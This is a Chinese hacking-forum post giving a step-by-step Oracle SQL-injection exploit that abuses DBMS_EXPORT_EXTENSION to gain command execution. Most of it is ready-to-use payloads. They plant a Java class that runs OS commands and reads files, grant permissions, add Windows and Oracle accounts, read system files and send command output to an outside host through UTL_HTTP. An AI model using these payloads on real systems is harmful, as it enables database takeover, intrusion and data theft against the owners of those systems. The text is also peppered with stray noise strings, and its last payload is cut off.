找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2991|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ' P2 g4 L! \* H5 f! Y
% N/ `( t7 D1 q, {, m6 s: H! j
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
# L. a2 |. ?/ _的形式即可。(用" 'a'|| "是为了让语句返回true值) , N2 f1 I- O1 o0 q' l
语句有点长,可能要用post提交。 / R: M' Z9 \9 w0 w, ~5 p% F, K6 `
以下是各个步骤:
9 ^+ X3 d( n, F8 `9 j" X1.创建包 7 y, E+ Q! i5 E
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
. f: r' W$ O1 l$ U& I* [  ]% p/xxx.jsp?id=1 and '1'<>'a'||( : ~* Q2 \* ~6 A+ o: v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 V. [+ O& A4 i( o& {- r) g+ Xcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
# V5 _9 h3 F7 Q, R5 h, s! pnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 x( o3 n- {; G% i: r}'''';END;'';END;--','SYS',0,'1',0) from dual
1 v! \* E% F3 @) ; O0 ]& w: i# T' e5 v7 m: e
------------------------ % M! s! _7 d" [( Z/ u
如果url有长度限制,可以把readFile()函数块去掉,即:
. H/ T9 A' {9 r% Q/ U% I% q1 d/xxx.jsp?id=1 and '1'<>'a'||( " u: X, g2 Q- L$ G: d4 d
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 r1 G1 m# C  Z- j* _. k7 P* c
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
& U/ L- e" b+ A' Z3 p) Anew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
0 g: `* b! U6 k}'''';END;'';END;--','SYS',0,'1',0) from dual
1 [$ R; W' `7 K6 i) 5 G% m8 _' y9 h8 i
同时把后面步骤 提到的 对readFile()的处理语句去掉。
8 g" f- i) N" k3 I------------------------------ ) R( D, f* j+ E9 n8 m
2.赋Java权限 ) ~+ p3 |5 G; j; n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual  D( M1 Z. B7 Q$ i3 T
3.创建函数 5 P+ n3 D, Y8 I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ m4 Y: ^* }3 N5 @- N9 c. J5 V
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4 J6 R5 M% v. C' I  fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: U) Q  a. o# x( _create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
9 d' P1 t3 v  x* N5 \9 V; u  ]7 {4.赋public执行函数的权限 : k( @6 Z7 S3 m" l- ]/ ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual$ u3 p) `* _. ]0 L9 R- `
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual+ g/ s& Y9 V9 S6 x
5.测试上面的几步是否成功
: x" o9 x$ Q( H0 \0 |7 j9 band '1'<>'11'||( 8 }/ G7 u% l0 w7 @
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' : @( f& l! X+ u# f( i1 h7 w7 n
) " F% l- A: k& X$ F" w
and '1'<>(
3 e" R9 k1 ?" d) |select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
7 s% ]- c5 t- x, }5 \) 1 K1 w& ?& Z/ v' k) m& F
6.执行命令:
# ~* v( D0 W& n* S# J0 g" f/xxx.jsp?id=1 and '1'<>( 6 e2 C# S3 n( B+ T* B5 L
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual / a2 D, \* [5 K& c. S+ o5 I9 A) P6 v$ G

7 R  [3 \! a. M8 c6 l) 8 h0 J! M  [# _( q
/xxx.jsp?id=1 and '1'<>(
/ m. x  {7 W1 R1 D2 dselect  sys.LinxReadFile('c:/boot.ini') from dual9 W; @2 @. G% A% n/ \

5 ^4 q. r" s: _, w+ k)
" M  w" }3 z. C+ ^  + J- O; W% Q# y, }" d  `+ h6 d2 X
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
7 B# _* Z) T# {& C8 Q如果要查看运行结果可以用 union :
+ S6 F4 f! u, a) s5 _/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual# G$ d+ Q2 y! d; v6 L, \  {
或者UTL_HTTP.request(: ; B3 N) p0 g0 x) V6 Z2 X
/xxx.jsp?id=1 and '1'<>(
, ~+ u5 q! Q& J, o) |" G& j  OSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual7 g8 a3 }6 _! \. S* \4 O1 S% [" n
) 7 z% r! D# I; z
/xxx.jsp?id=1 and '1'<>( / q5 R' g, c) [, ]" B
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
& J! q$ x5 o# c+ {9 t. x0 ~) 8 K4 o' [% D/ U( F& @- J0 S6 R8 c
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
9 v& I' i  l( F--------------------
# L2 U! h1 h" v) f/ ~$ _  w. G) i6.内部变化 8 U( o% P& t$ B: ^* t4 u4 l0 c1 }. s
通过以下命令可以查看all_objects表达改变:
: J& r( \- c3 kselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
# m% |" J, U# W4 \0 A  V& M, k7.删除我们创建的函数 ; V$ Q* ~1 n3 a1 q  F. N: ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ u% U' Y4 j: c( i; S, J: D
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
1 h0 y, O/ d/ i& g1 R: v" t==================================================== 2 s% ^, M8 e8 H+ J  M3 k
全文结束。谨以此文赠与我的朋友。
8 m" `0 J% R1 t2 _linx
9 ?4 w5 m' ^' ?4 S* B124829445 3 {% v& T* f6 Y/ [5 n7 a1 m
2008.1.12
& o4 j. P6 Z: x( n3 Elinyujian@bjfu.edu.cn ! a' K( ^& p/ H$ X- b/ W7 y+ g' y6 R2 U
====================================================================== 9 m; T4 L; N9 j9 k& D8 L) G
测试漏洞的另一方法:
: P& y5 O1 F) Y创建oracle帐号: # B: f# @/ l; y$ K3 Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! n' q6 R" A8 U( m
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
, T+ d% ]: H3 S即: , E" d, z, e6 ^! P; V9 g0 Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
9 q& Z( L: ]0 {! e' ^! R7 Lchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 9 H' B  @% k$ \! U$ K
确定漏洞存在:
" u1 N! G# c+ }, m1<>(
. n% c, c  e+ nselect user_id from all_users where username='LINXSQL'
5 v& Q+ J, T. h+ N)
9 ]0 T& y* p  N8 o给linxsql连接权限: , R- g; D: Q% N4 u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; U: S+ a* c: [# A8 {" ?GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual - @' n4 g1 ?2 [4 L2 J! c% w
删除帐号:
4 s& ]& F, M; F% N% G- pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% A. n+ o1 _! Z* x% S. c* L- S
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
3 v/ B$ N# h% c8 }. A1 ~2 o5 {====================== 7 y! e' i8 j- t* B' E* M
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:2 P+ \9 w& l: U% h2 A' T
1.jsp?id=1 and '1'<>( 7 h+ q! Q5 \, ~% c, N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' W( t. `! e7 t$ B9 s9 ccreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual( a* T8 B! N& |( j! G' m
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- m# \- g( Q# r: n9 J# W: N
 )
* l8 L0 E9 }2 x1 I( B
5 c! ?) J& Y$ a( I4 o; n
2 b6 t. z/ O4 _
$ n5 z% a2 K, i9 t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表